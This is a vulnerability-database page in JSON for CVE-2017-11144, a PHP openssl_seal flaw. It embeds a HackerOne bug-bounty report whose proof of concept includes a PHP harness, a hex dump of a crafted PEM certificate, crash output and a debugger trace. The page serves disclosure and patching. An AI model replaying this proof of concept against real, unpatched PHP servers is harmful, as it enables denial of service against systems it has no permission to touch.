DATABASE RESOURCES PRICING ABOUT US

{"id": "VERACODE:19303", "vendorId": null, "type": "veracode", "bulletinFamily": "software", "title": "Denial Of Service (DoS)", "description": "PHP is vulnerable to denial of service(DoS) attacks. This is because the openssl extension PEM sealing code did not check the return value of the OpenSSL sealing function which could lead to a crash of the PHP interpreter.\n", "published": "2019-05-16T02:59:59", "modified": "2022-04-19T18:12:58", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-19303/summary", "reporter": "Veracode Vulnerability Database", "references": ["https://access.redhat.com/documentation/en-us/red_hat_software_collections/3/html/3.1_release_notes/chap-rhscl#sect-RHSCL-Changes-php", "https://access.redhat.com/security/updates/classification/#moderate", "https://access.redhat.com/errata/RHSA-2018:1296", "https://www.debian.org/security/2018/dsa-4080", "https://www.debian.org/security/2018/dsa-4081", "http://git.php.net/?p=php-src.git;a=commit;h=73cabfedf519298e1a11192699f44d53c529315e", "http://git.php.net/?p=php-src.git;a=commit;h=89637c6b41b510c20d262c17483f582f115c66d6", "http://git.php.net/?p=php-src.git;a=commit;h=91826a311dd37f4c4e5d605fa7af331e80ddd4c3", "http://openwall.com/lists/oss-security/2017/07/10/6", "http://php.net/ChangeLog-5.php", "http://php.net/ChangeLog-7.php", "https://bugs.php.net/bug.php?id=74651", "https://security.netapp.com/advisory/ntap-20180112-0001/", "https://www.tenable.com/security/tns-2017-12"], "cvelist": ["CVE-2017-11144"], "immutableFields": [], "lastseen": "2023-04-18T13:54:31", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cloudlinux", "idList": ["CLSA-2020:1605798462"]}, {"type": "cve", "idList": ["CVE-2017-11144"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1034-1:86C1B", "DEBIAN:DLA-1034-1:C61BE", "DEBIAN:DSA-4080-1:ADEE1", "DEBIAN:DSA-4081-1:FFD0A"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-11144"]}, {"type": "f5", "idList": ["F5:K20289222"]}, {"type": "hackerone", "idList": ["H1:248609"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1034.NASL", "DEBIAN_DSA-4080.NASL", "DEBIAN_DSA-4081.NASL", "EULEROS_SA-2019-2221.NASL", "EULEROS_SA-2019-2438.NASL", "EULEROS_SA-2019-2649.NASL", "EULEROS_SA-2020-1747.NASL", "OPENSUSE-2017-1010.NASL", "OPENSUSE-2017-994.NASL", "PHP_5_6_31.NASL", "PHP_7_0_21.NASL", "PHP_7_1_7.NASL", "SECURITYCENTER_PHP_5_6_31.NASL", "SUSE_SU-2017-2303-1.NASL", "SUSE_SU-2017-2317-1.NASL", "SUSE_SU-2017-2522-1.NASL", "UBUNTU_USN-3382-1.NASL", "WEB_APPLICATION_SCANNING_98822", "WEB_APPLICATION_SCANNING_98844", "WEB_APPLICATION_SCANNING_98864"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704080", "OPENVAS:1361412562310704081", "OPENVAS:1361412562310811481", "OPENVAS:1361412562310811482", "OPENVAS:1361412562310843281", "OPENVAS:1361412562310851607", "OPENVAS:1361412562310891034", "OPENVAS:1361412562311220192221", "OPENVAS:1361412562311220192438", "OPENVAS:1361412562311220192649", "OPENVAS:1361412562311220201747"]}, {"type": "osv", "idList": ["OSV:DLA-1034-1", "OSV:DSA-4080-1", "OSV:DSA-4081-1"]}, {"type": "redhat", "idList": ["RHSA-2018:1296"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-11144"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:2337-1", "SUSE-SU-2017:2303-1"]}, {"type": "ubuntu", "idList": ["USN-3382-1", "USN-3382-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-11144"]}, {"type": "veracode", "idList": ["VERACODE:19297"]}]}, "epss": [{"cve": "CVE-2017-11144", "epss": 0.01193, "percentile": 0.83044, "modified": "2023-04-17"}], "score": {"value": 8.3, "vector": "NONE"}, "vulnersScore": 8.3}, "_state": {"dependencies": 1681826175, "score": 1684018209, "epss": 1681827988}, "_internal": {"score_hash": "88cd3503b1c3bcab7887b115297d6c1c"}, "affectedSoftware": [{"version": "7.0.10__2.el7", "operator": "eq", "name": "rh-php70-php"}, {"version": "7.0.10__2.el6", "operator": "eq", "name": "rh-php70-php"}, {"version": "7.0.10__2.el7", "operator": "eq", "name": "rh-php70-php"}, {"version": "7.0.10__2.el6", "operator": "eq", "name": "rh-php70-php"}]}

{"hackerone": [{"lastseen": "2023-09-03T19:51:53", "bounty": 0.0, "description": "### Description:\nA wild memcpy is discovered in the openssl package included in stable PHP release. During parsing a PEM certificate in openssl_seal(), an invalid key length is produced after parsing, eskl[0] value is -1 after the call to EVP_SealInit(), subsequently causing a heap overflow via a wild memcpy.\n\n### Impact:\nAffects both PHP 5 before 5.6.31 ([ChangeLog](http://php.net/ChangeLog-5.php)) and PHP 7 before 7.1.7 ([ChangeLog](http://php.net/ChangeLog-7.php)).\nResolved PHP [bug report](https://bugs.php.net/bug.php?id=74651), will update the pending CVE.\n\n### Exploitability:\nPoC provides immediate DoS of the HTTP server; potential code execution requires setting up a malicious external certificate, depending on the actual exploitability of the wild memcpy. We will update again if we have built a different PoC.\n\n### Repro:\n```\n<?php \n$argc = $_SERVER['argc'];\n$argv = $_SERVER['argv'];\n\n$dir_str = dirname(__FILE__);\n$file_str = ($dir_str).\"/\".$argv[1];\necho \"Input file: \".$file_str.\"\\n\";\n\nif(!extension_loaded('openssl')) print \"openssl not loaded.\\n\";\n\n$inputstr = file_get_contents($file_str);\nprint strlen($inputstr) . \" bytes read.\\n\";\n\n$pub_key_id = openssl_get_publickey($inputstr);\nvar_dump($pub_key_id);\n\nopenssl_seal($inputstr, $sealed, $ekeys, array($pub_key_id, $pub_key_id), 'AES-128-ECB');\n\nvar_dump($sealed);\t\n?>\n$ uname -a\nLinux CSLB16U 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux\n\n$ ./i686-pc-linux-gnu-php --version\nPHP 7.1.5 (cli) (built: May 25 2017 16:35:37) ( NTS )\nCopyright (c) 1997-2017 The PHP Group\nZend Engine v3.1.0, Copyright (c) 1998-2017 Zend Technologies\n\n$ xxd -g 1 repro.pem \n00000000: 2d 2d 2d 2d 2d 42 45 47 49 4e 20 43 45 52 54 49 -----BEGIN CERTI\n00000010: 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a 4d 49 49 45 FICATE-----.MIIE\n00000020: 6f 44 43 43 42 41 6d 67 41 77 49 42 41 67 49 42 oDCCBAmgAwIBAgIB\n00000030: 4a 7a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 JzANBgkqhkiG9w0B\n00000040: 41 51 51 46 41 44 43 42 6b 44 45 4c 4d 41 6b 47 AQQFADCBkDELMAkG\n00000050: 41 31 55 45 46 68 4d 43 55 6b 38 78 0a 45 44 41 A1UEFhMCUk8x.EDA\n00000060: 4f 42 67 4e 56 42 41 67 54 42 31 4a 76 62 57 46 OBgNVBAgTB1JvbWF\n00000070: 75 61 57 45 78 45 44 41 4f 42 67 4e 56 42 41 63 uaWExEDAOBgNVBAc\n00000080: 54 42 30 4e 79 59 57 6c 76 64 6d 45 78 44 7a 41 TB0NyYWlvdmExDzA\n00000090: 4e 42 67 4e 56 42 41 6f 54 42 6c 4e 6c 0a 63 6d NBgNVBAoTBlNl.cm\n000000a0: 64 70 64 54 45 54 4d 42 45 47 41 31 55 45 43 78 dpdTETMBEGA1UECx\n000000b0: 4d 4b 55 32 56 79 5a 32 6c 31 49 46 4e 53 54 44 MKU2VyZ2l1IFNSTD\n000000c0: 45 53 4d 42 41 47 41 31 55 45 41 78 4d 4a 55 32 ESMBAGA1UEAxMJU2\n000000d0: 56 79 5a 32 6c 31 49 45 4e 42 4d 53 4d 77 0a 49 VyZ2l1IENBMSMw.I\n000000e0: 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 6b 42 46 QYJKoZIhvcNAQkBF\n000000f0: 68 52 75 58 33 4e 6c 63 6d 64 70 64 55 42 6f 62 hRuX3NlcmdpdUBob\n00000100: 33 52 74 59 57 6c 73 4c 6d 4e 76 62 54 41 65 46 3RtYWlsLmNvbTAeF\n00000110: 77 30 77 4e 44 41 31 4d 54 51 78 4d 7a 4d 30 0a w0wNDA1MTQxMzM0.\n00000120: 4e 54 5a 61 46 77 30 77 4e 54 41 31 4d 54 51 78 NTZaFw0wNTA1MTQx\n00000130: 4d 7a 4d 30 4e 54 5a 61 4d 49 47 61 4d 51 73 77 MzM0NTZaMIGaMQsw\n00000140: 43 51 59 44 56 51 51 47 45 77 4a 53 54 7a 45 51 CQYDVQQGEwJSTzEQ\n00000150: 4d 41 34 47 41 31 55 45 43 42 4d 48 55 6d 39 74 MA4GA1UECBMHUm9t\n00000160: 0a 59 57 35 70 59 54 45 51 4d 41 34 47 41 31 55 .YW5pYTEQMA4GA1U\n00000170: 45 42 78 4d 48 51 33 4a 68 61 57 39 32 59 54 45 EBxMHQ3JhaW92YTE\n00000180: 54 4d 42 45 47 41 31 55 45 43 68 4d 4b 55 32 56 TMBEGA1UEChMKU2V\n00000190: 79 5a 32 6c 31 49 46 4e 53 54 44 45 54 4d 42 45 yZ2l1IFNSTDETMBE\n000001a0: 47 0a 41 31 55 45 43 78 4d 4b 55 32 56 79 5a 32 G.A1UECxMKU2VyZ2\n000001b0: 6c 31 49 46 4e 53 54 44 45 59 4d 42 59 47 41 31 l1IFNSTDEYMBYGA1\n000001c0: 55 45 41 78 4d 50 55 32 56 79 5a 32 6c 31 49 48 UEAxMPU2VyZ2l1IH\n000001d0: 42 6c 63 6e 4e 76 62 6d 46 73 4d 53 4d 77 49 51 BlcnNvbmFsMSMwIQ\n000001e0: 59 4a 0a 4b 6f 5a 49 68 76 63 4e 41 51 6b 42 46 YJ.KoZIhvcNAQkBF\n000001f0: 68 52 75 58 33 4e 6c 63 6d 64 70 64 55 42 6f 62 hRuX3NlcmdpdUBob\n00000200: 33 52 74 59 57 6c 73 4c 6d 4e 76 62 54 43 42 6e 3RtYWlsLmNvbTCBn\n00000210: 7a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 zANBgkqhkiG9w0BA\n00000220: 51 45 46 0a 41 41 4f 42 6a 51 41 77 67 59 6b 43 QEF.AAOBjQAwgYkC\n00000230: 67 59 45 41 70 4e 6a 37 58 58 7a 38 54 38 46 63 gYEApNj7XXz8T8Fc\n00000240: 4c 49 57 70 42 6e 69 50 59 6f 6d 33 51 63 54 36 LIWpBniPYom3QcT6\n00000250: 54 37 75 30 78 52 50 48 71 74 71 7a 6a 35 6f 62 T7u0xRPHqtqzj5ob\n00000260: 6f 42 59 70 0a 44 4a 65 35 64 33 35 34 2f 79 30 oBYp.DJe5d354/y0\n00000270: 67 4a 54 70 69 4c 74 38 2b 66 54 72 50 67 57 58 gJTpiLt8+fTrPgWX\n00000280: 6e 62 48 6d 33 70 4f 48 67 58 7a 54 63 58 36 41 nbHm3pOHgXzTcX6A\n00000290: 72 61 6e 69 30 47 44 55 30 2f 78 44 69 34 56 6b rani0GDU0/xDi4Vk\n000002a0: 43 52 47 63 53 0a 59 71 58 32 73 4a 70 63 44 7a CRGcS.YqX2sJpcDz\n000002b0: 41 62 6d 4b 39 55 44 4d 74 33 78 66 2f 4f 31 42 AbmK9UDMt3xf/O1B\n000002c0: 38 41 4a 61 6e 33 52 66 4f 30 42 6d 33 6f 7a 54 8AJan3RfO0Bm3ozT\n000002d0: 45 50 7a 69 4c 4d 6b 6d 73 69 59 72 35 62 2f 4c EPziLMkmsiYr5b/L\n000002e0: 34 43 41 77 45 41 0a 41 61 4f 43 41 66 77 77 67 4CAwEA.AaOCAfwwg\n000002f0: 67 48 34 4d 41 6b 47 41 31 55 64 45 77 51 43 4d gH4MAkGA1UdEwQCM\n00000300: 41 41 77 4e 51 59 4a 59 49 5a 49 41 59 62 34 51 AAwNQYJYIZIAYb4Q\n00000310: 67 45 4e 42 43 67 57 4a 6b 5a 76 63 69 42 48 63 gENBCgWJkZvciBHc\n00000320: 6d 6c 6b 49 48 56 7a 0a 5a 53 42 76 62 6d 78 35 mlkIHVz.ZSBvbmx5\n00000330: 4f 79 42 79 5a 58 46 31 5a 58 4e 30 49 48 52 68 OyByZXF1ZXN0IHRh\n00000340: 5a 79 42 31 63 32 56 79 56 47 46 6e 4d 42 45 47 ZyB1c2VyVGFnMBEG\n00000350: 43 57 43 47 53 41 47 47 2b 45 49 42 41 51 51 45 CWCGSAGG+EIBAQQE\n00000360: 41 77 49 46 34 44 41 2f 0a 42 67 4e 56 48 52 38 AwIF4DA/.BgNVHR8\n00000370: 45 4f 44 41 32 4d 44 53 67 4d 71 41 77 68 69 35 EODA2MDSgMqAwhi5\n00000380: 6f 64 48 52 77 4f 69 38 76 62 57 39 69 61 57 78 odHRwOi8vbW9iaWx\n00000390: 6c 4c 6d 4a 73 64 57 55 74 63 32 39 6d 64 48 64 lLmJsdWUtc29mdHd\n000003a0: 68 63 6d 55 75 63 6d 38 36 0a 4f 54 41 76 59 32 hcmUucm86.OTAvY2\n000003b0: 45 76 59 33 4a 73 4c 6e 4e 6f 64 47 31 73 4d 44 EvY3JsLnNodG1sMD\n000003c0: 55 47 43 57 43 47 53 41 47 47 2b 45 49 42 43 41 UGCWCGSAGG+EIBCA\n000003d0: 51 6f 46 69 5a 6f 64 48 52 77 4f 69 38 76 62 57 QoFiZodHRwOi8vbW\n000003e0: 39 69 61 57 78 6c 4c 6d 4a 73 0a 64 57 55 74 63 9iaWxlLmJs.dWUtc\n000003f0: 32 39 6d 64 48 64 68 63 6d 55 75 63 6d 38 36 4f 29mdHdhcmUucm86O\n00000400: 54 41 76 63 48 56 69 4c 7a 41 68 42 67 4e 56 48 TAvcHViLzAhBgNVH\n00000410: 52 45 45 47 6a 41 59 67 52 5a 7a 5a 58 4a 6e 61 REEGjAYgRZzZXJna\n00000420: 58 56 41 59 6d 78 31 5a 58 4e 76 0a 5a 6e 52 33 XVAYmx1ZXNv.ZnR3\n00000430: 59 58 4a 6c 4c 6e 4a 76 4d 42 30 47 41 31 55 64 YXJlLnJvMB0GA1Ud\n00000440: 44 67 51 57 42 42 53 77 70 2f 2f 35 51 52 58 65 DgQWBBSwp//5QRXe\n00000450: 49 7a 6d 39 33 54 45 50 6c 36 43 79 6f 6e 54 67 Izm93TEPl6CyonTg\n00000460: 2f 44 43 42 70 77 59 44 56 52 30 6a 0a 42 49 47 /DCBpwYDVR0j.BIG\n00000470: 66 4d 49 47 63 6f 59 47 57 70 49 47 54 4d 49 47 fMIGcoYGWpIGTMIG\n00000480: 51 4d 51 73 77 43 51 59 44 56 51 51 47 45 77 4a QMQswCQYDVQQGEwJ\n00000490: 53 54 7a 45 51 4d 41 34 47 41 31 55 45 43 42 4d STzEQMA4GA1UECBM\n000004a0: 48 55 6d 39 74 59 57 35 70 59 54 45 51 0a 4d 41 HUm9tYW5pYTEQ.MA\n000004b0: 34 47 41 31 55 45 42 78 4d 48 51 33 4a 68 61 57 4GA1UEBxMHQ3JhaW\n000004c0: 39 32 59 54 45 50 4d 41 30 47 41 31 55 45 43 68 92YTEPMA0GA1UECh\n000004d0: 4d 47 55 32 56 79 5a 32 6c 31 4d 52 4d 77 45 51 MGU2VyZ2l1MRMwEQ\n000004e0: 59 44 56 51 51 4c 45 77 70 54 5a 58 4a 6e 0a 61 YDVQQLEwpTZXJn.a\n000004f0: 58 55 67 55 31 4a 4d 4d 52 49 77 45 41 59 44 56 XUgU1JMMRIwEAYDV\n00000500: 51 51 44 45 77 6c 54 5a 58 4a 6e 61 58 55 67 51 QQDEwlTZXJnaXUgQ\n00000510: 30 45 78 49 7a 41 68 42 67 6b 71 68 6b 69 47 39 0ExIzAhBgkqhkiG9\n00000520: 77 30 42 43 51 45 57 46 47 35 66 63 32 56 79 0a w0BCQEWFG5fc2Vy.\n00000530: 5a 32 6c 31 51 47 68 76 64 47 31 68 61 57 77 75 Z2l1QGhvdG1haWwu\n00000540: 59 32 39 74 67 67 45 41 4d 41 73 47 41 31 55 64 Y29tggEAMAsGA1Ud\n00000550: 44 77 51 45 41 77 49 45 38 44 41 6a 42 67 6c 67 DwQEAwIE8DAjBglg\n00000560: 68 6b 67 42 68 76 68 43 41 51 49 45 46 68 59 55 hkgBhvhCAQIEFhYU\n00000570: 0a 61 48 52 30 63 44 6f 76 4c 7a 59 79 4c 6a 49 .aHR0cDovLzYyLjI\n00000580: 7a 4d 53 34 35 4f 43 34 31 4d 69 38 77 43 77 59 zMS45OC41Mi8wCwY\n00000590: 44 4b 67 4d 45 42 41 51 2b 35 32 49 30 4d 41 30 DKgMEBAQ+52I0MA0\n000005a0: 47 43 53 71 47 53 49 62 33 44 51 45 42 42 41 55 GCSqGSIb3DQEBBAU\n000005b0: 41 0a 41 34 47 42 41 49 42 49 4f 4a 2b 69 69 4c A.A4GBAIBIOJ+iiL\n000005c0: 79 51 66 4e 4a 45 59 2b 49 4d 65 66 61 79 51 65 yQfNJEY+IMefayQe\n000005d0: 61 30 6e 6d 75 58 59 59 2b 46 2b 4c 31 44 46 6a a0nmuXYY+F+L1DFj\n000005e0: 53 43 37 78 43 68 79 74 67 59 6f 50 4e 6e 4b 6b SC7xChytgYoPNnKk\n000005f0: 68 68 0a 33 64 57 50 74 78 62 73 77 69 71 4b 59 hh.3dWPtxbswiqKY\n00000600: 55 6e 47 69 36 79 33 48 69 34 55 68 44 73 4f 61 UnGi6y3Hi4UhDsOa\n00000610: 44 57 32 39 74 32 53 33 30 35 68 53 63 32 71 67 DW29t2S305hSc2qg\n00000620: 6a 4f 69 4e 74 52 59 51 49 56 59 51 38 45 48 47 jOiNtRYQIVYQ8EHG\n00000630: 31 6b 37 0a 46 6c 36 33 53 37 75 43 4f 68 6e 56 1k7.Fl63S7uCOhnV\n00000640: 4a 74 2b 34 4d 6e 55 4b 31 4e 36 2f 70 77 67 73 Jt+4MnUK1N6/pwgs\n00000650: 70 2b 5a 32 47 76 45 73 44 47 31 71 43 4b 6e 76 p+Z2GvEsDG1qCKnv\n00000660: 4e 70 66 36 0a 2d 2d 2d 2d 2d 45 4e 44 20 43 45 Npf6.-----END CE\n00000670: 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a RTIFICATE-----.\n\n$ ./i686-pc-linux-gnu-php openSSLharn.php repro.pem \nInput file: /home/sebastian/Documents/php_gdb/bin/repro.pem\n1663 bytes read.\nresource(6) of type (OpenSSL key)\n=================================================================\n==32018==ERROR: AddressSanitizer: negative-size-param: (size=-1)\n #0 0xf71fab04 in __asan_memcpy (/usr/lib/i386-linux-gnu/libasan.so.2+0x8ab04)\n #1 0xf71fac2f in memcpy (/usr/lib/i386-linux-gnu/libasan.so.2+0x8ac2f)\n #2 0x8cdacb6 in zend_string_init /home/sebastian/Documents/php-7.1.5/Zend/zend_string.h:160\n #3 0x8cdacb6 in add_next_index_stringl /home/sebastian/Documents/php-7.1.5/Zend/zend_API.c:1554\n #4 0x81627d2 in zif_openssl_seal /home/sebastian/Documents/php-7.1.5/ext/openssl/openssl.c:5932\n #5 0x8e7a9b5 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:628\n #6 0x8e74c59 in execute_ex /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:429\n #7 0x8e766ef in zend_execute /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:474\n #8 0x8cc60bd in zend_execute_scripts /home/sebastian/Documents/php-7.1.5/Zend/zend.c:1476\n #9 0x8b0c6c3 in php_execute_script /home/sebastian/Documents/php-7.1.5/main/main.c:2537\n #10 0x920a0bc in do_cli /home/sebastian/Documents/php-7.1.5/sapi/cli/php_cli.c:993\n #11 0x920cbef in main /home/sebastian/Documents/php-7.1.5/sapi/cli/php_cli.c:1381\n #12 0xf6a89636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)\n #13 0x806a970 (/home/sebastian/Documents/php_gdb/bin/i686-pc-linux-gnu-php+0x806a970)\n\nAddressSanitizer can not describe address in more detail (wild memory access suspected).\nSUMMARY: AddressSanitizer: negative-size-param ??:0 __asan_memcpy\n==32018==ABORTING\n```\n### Analysis:\nThe bug is due to mistakes in both OpenSSL and PHP:\n\n1) OpenSSL 1.1.0e failed to document correct behavior of the EVP_SealInit() function:\n\nEVP_SealInit() may return -1 when one of the keys has a negative length:\n\nhttps://github.com/openssl/openssl/blob/9bb6f82958537b9ab5ec8fe44c762f448d4a59d8/crypto/evp/p_seal.c\n```\n41 for (i = 0; i < npubk; i++) {\n42 ekl[i] =\n43 EVP_PKEY_encrypt_old(ek[i], key, EVP_CIPHER_CTX_key_length(ctx),\n44 pubk[i]);\n45 if (ekl[i] <= 0)\n46 return (-1);\n47 }\n48 return (npubk);\n```\nHowever the official documentation for EVP_SealInit() did not mention -1 as a return value on certain error conditions:\nhttps://www.openssl.org/docs/man1.1.0/crypto/EVP_SealInit.html\n\n2) PHP did not handle -1 as a return value of EVP_SealInit(), and failed to validate whether eksl[i] holds a proper length:\n\nIn php-7.1.5/ext/openssl/openssl.c:\n```\n5930\t\tfor (i=0; i<nkeys; i++) {\n5931\t\t\teks[i][eksl[i]] = '\\0';\n5932\t\t\tadd_next_index_stringl(ekeys, (const char*)eks[i], eksl[i]);\n5933\t\t\tefree(eks[i]);\n5934\t\t\teks[i] = NULL;\n5935\t\t}\n```\nThe eksl[0] as -1, when passed to add_next_index_stringl(), will trigger the wild memcpy.\n\nA quick fix would be adding checks for both the return value of EVP_SealInit(), and values of eksl[i].\n\nThe bug also contains a negative indexing issue at:\n`5931 eks[i][eksl[i]] = '\\0';`\n\n### In GDB:\n```\nBreakpoint 1, zif_openssl_seal (execute_data=0xf2e13270, return_value=0xffff9150) at /home/sebastian/Documents/php-7.1.5/ext/openssl/openssl.c:5881\n5881\t\teksl = safe_emalloc(nkeys, sizeof(*eksl), 0);\n\n(gdb) n\n5882\t\teks = safe_emalloc(nkeys, sizeof(*eks), 0);\n\n(gdb) x/10bx eksl\n0xf2e6b010:\t0x18\t0xb0\t0xe6\t0xf2\t0x00\t0x00\t0x00\t0x00\n0xf2e6b018:\t0x20\t0xb0\n\n(gdb) watch eksl[0]\nHardware watchpoint 2: eksl[0]\n(gdb) c\nContinuing.\n\nHardware watchpoint 2: eksl[0]\n\nOld value = -219762664\nNew value = -1\n0xf763288d in EVP_SealInit () from /usr/local/lib/libcrypto.so.1.1\n(gdb) bt\n#0 0xf763288d in EVP_SealInit () from /usr/local/lib/libcrypto.so.1.1\n#1 0x08161ec3 in zif_openssl_seal (execute_data=0xf2e13270, return_value=0xffff9150) at /home/sebastian/Documents/php-7.1.5/ext/openssl/openssl.c:5913\n#2 0x08e7a9b6 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER () at /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:628\n#3 0x08e74c5a in execute_ex (ex=0xf2e13020) at /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:429\n#4 0x08e766f0 in zend_execute (op_array=0xf2e68200, return_value=0x0) at /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:474\n#5 0x08cc60be in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /home/sebastian/Documents/php-7.1.5/Zend/zend.c:1476\n#6 0x08b0c6c4 in php_execute_script (primary_file=0xffffbc10) at /home/sebastian/Documents/php-7.1.5/main/main.c:2537\n#7 0x0920a0bd in do_cli (argc=3, argv=0xf4000670) at /home/sebastian/Documents/php-7.1.5/sapi/cli/php_cli.c:993\n#8 0x0920cbf0 in main (argc=3, argv=0xf4000670) at /home/sebastian/Documents/php-7.1.5/sapi/cli/php_cli.c:1381\n```\neksl[0] as -1 when passed into add_next_index_stringl() would cause the wild copy:\n```\n5930 for (i=0; i<nkeys; i++) {\n5931 eks[i][eksl[i]] = '\\0';\n5932 add_next_index_stringl(ekeys, (const char*)eks[i], eksl[i]);\n5933 efree(eks[i]);\n5934 eks[i] = NULL;\n5935 }\n```\nContinuing.\n```\n=================================================================\n==26054==ERROR: AddressSanitizer: negative-size-param: (size=-1)\n #0 0xf7ae5b04 in __asan_memcpy (/usr/lib/i386-linux-gnu/libasan.so.2+0x8ab04)\n #1 0xf7ae5c2f in memcpy (/usr/lib/i386-linux-gnu/libasan.so.2+0x8ac2f)\n #2 0x8cdacb6 in zend_string_init /home/sebastian/Documents/php-7.1.5/Zend/zend_string.h:160\n #3 0x8cdacb6 in add_next_index_stringl /home/sebastian/Documents/php-7.1.5/Zend/zend_API.c:1554\n #4 0x81627d2 in zif_openssl_seal /home/sebastian/Documents/php-7.1.5/ext/openssl/openssl.c:5932\n #5 0x8e7a9b5 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:628\n #6 0x8e74c59 in execute_ex /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:429\n #7 0x8e766ef in zend_execute /home/sebastian/Documents/php-7.1.5/Zend/zend_vm_execute.h:474\n #8 0x8cc60bd in zend_execute_scripts /home/sebastian/Documents/php-7.1.5/Zend/zend.c:1476\n #9 0x8b0c6c3 in php_execute_script /home/sebastian/Documents/php-7.1.5/main/main.c:2537\n #10 0x920a0bc in do_cli /home/sebastian/Documents/php-7.1.5/sapi/cli/php_cli.c:993\n #11 0x920cbef in main /home/sebastian/Documents/php-7.1.5/sapi/cli/php_cli.c:1381\n #12 0xf7374636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)\n #13 0x806a970 (/home/sebastian/Documents/php_gdb/bin/i686-pc-linux-gnu-php+0x806a970)\n\nAddressSanitizer can not describe address in more detail (wild memory access suspected).\nSUMMARY: AddressSanitizer: negative-size-param ??:0 __asan_memcpy\n==26054==ABORTING\n```\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-07-12T09:52:49", "type": "hackerone", "title": "Internet Bug Bounty: PHP OpenSSL zif_openssl_seal() heap overflow (wild memcpy)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11144"], "modified": "2019-10-14T04:39:39", "id": "H1:248609", "href": "https://hackerone.com/reports/248609", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2023-10-01T06:30:13", "description": "In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, the openssl extension PEM sealing code did not check the return value of the OpenSSL sealing function, which could lead to a crash of the PHP interpreter, related to an interpretation conflict for a negative number in ext/openssl/openssl.c, and an OpenSSL documentation omission.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-07-10T14:29:00", "type": "cve", "title": "CVE-2017-11144", "cwe": ["CWE-754"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": 